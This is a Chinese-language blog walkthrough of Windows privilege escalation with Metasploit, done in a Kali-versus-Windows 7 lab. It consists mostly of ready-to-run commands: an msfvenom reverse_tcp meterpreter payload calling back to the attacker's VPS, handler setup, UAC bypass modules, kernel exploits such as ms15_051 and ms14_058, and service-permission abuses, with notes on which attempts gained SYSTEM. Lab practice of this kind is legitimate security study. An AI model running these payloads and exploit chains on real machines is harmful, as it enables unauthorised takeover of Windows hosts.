Metasploit提权

一、bypassuac

       用户账户控制User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。--  百度

当getsystem命令提权失败,就需要绕过系统UAC来进行提权。

攻击机:Kali Linux

靶    机:Windows 7旗舰版

1.上线MSF,获得会话

生成payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your-vps-ip lport=8808 -f exe -o msf.exe

设置侦听:

#handler -H your-ip -P 8808 -p windows/x64/meterpreter/reverse_tcp

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost your-ip
set lport 8899
exploit

2.使用bypassuac模块

search bypassuac

以下模块都可以尝试,直到成功获取权限

use 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost  your-ip

set lport  6666

set session 1

show target

set target 1

exploit

 getsystem

获取hash


二、Local_exploit_suggester

 local_exploit_suggester 是一个漏洞利用后渗透模块,可用于检查系统中是否存在本地漏洞。它执行本地漏洞利用检查;但不会运行利用任何漏洞,这意味着可以在不进行入侵的情况下扫描系统。不必手动搜索有效的本地漏洞;它将根据系统的平台和体系结构向您显示目标容易受到哪些攻击。

rev2self   #降级为普通权限

use post/multi/recon/local_exploit_suggester
set session 1
exploit

 探测出10个模块

bypassuac_dotnet_profiler

rev2self   #降级为普通权限

use exploit/windows/local/bypassuac_dotnet_profiler
set session 1
run

有一个提示:此漏洞利用需要手动清除'C:\Users\whoami\AppData\Local\Temp\HflSEhA.dll!

bypassuac_eventvwr

rev2self   #降级为普通权限

use exploit/windows/local/bypassuac_eventvwr
set session 1
set payload windows/x64/meterpreter/reverse_tcp
set target 1
exploit

cve_2020_1054_drawiconex_lpe

use exploit/windows/local/cve_2020_1054_drawiconex_lpe

 set session 1

run

提权失败  #10个模块里,不是每个模块都可以成功利用,

CVE-2019-1458-wiozardopium

use exploit/windows/local/cve_2019_1458_wizardopium
set session 1
run

这个也没有利用成功

Windows内核漏洞提权

enum_patches

探测系统补丁:

use post/windows/gather/enum_patches
set session 1
run

在线网站查询补丁对应漏洞
https://i.hacking8.com/tiquan

Windows-Exploit-suggester

查找系统漏洞可利用模块:

use post/multi/recon/local_exploit_suggester
set session 1
run

Windows ClientCopyImage Win32k Exploit

此模块适用于Win7、Win server 2008R2 SP1 x64

use exploit/windows/local/ms15_051_client_copy_image

set payload windows/x64/meterpreter/reverse_tcp

set lport 6666
set session 2

set  target 1
exploit

getuid 查看权限

getsystem 提升权限       # rev2self   #降级为普通权限

 Windows TrackPopupMenu Win32k NULL指针解引用

ms14_058_track_popup_menu

use exploit/windows/local/ms14_058_track_popup_menu

set payload windows/x64/meterpreter/reverse_tcp

set lport 6666
set session 2

set  target 1
exploit

运行后,直接获得system权限

Windows系统服务漏洞提权

unquoted_service_path       #可信任服务路径漏洞

靶机:Windows7 专业版/旗舰版  #都没有攻击成功

use exploit/windows/local/unquoted_service_path

set payload windows/x64/meterpreter/reverse_tcp

set session 1
exploit

 结果显示:由于失败而中止利用漏洞:不易受攻击:找不到存在受信任路径问题的服务

service_permissions模块

use exploit/windows/local/service_permissions

set payload windows/x64/meterpreter/reverse_tcp

set session 1
exploit

 运行后,获得system权限

always_install_elevated模块

use exploit/windows/local/always_install_elevated

set payload windows/x64/meterpreter/reverse_tcp

set session 1
run

#利用漏洞攻击已完成,但未创建会话。

 ...

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值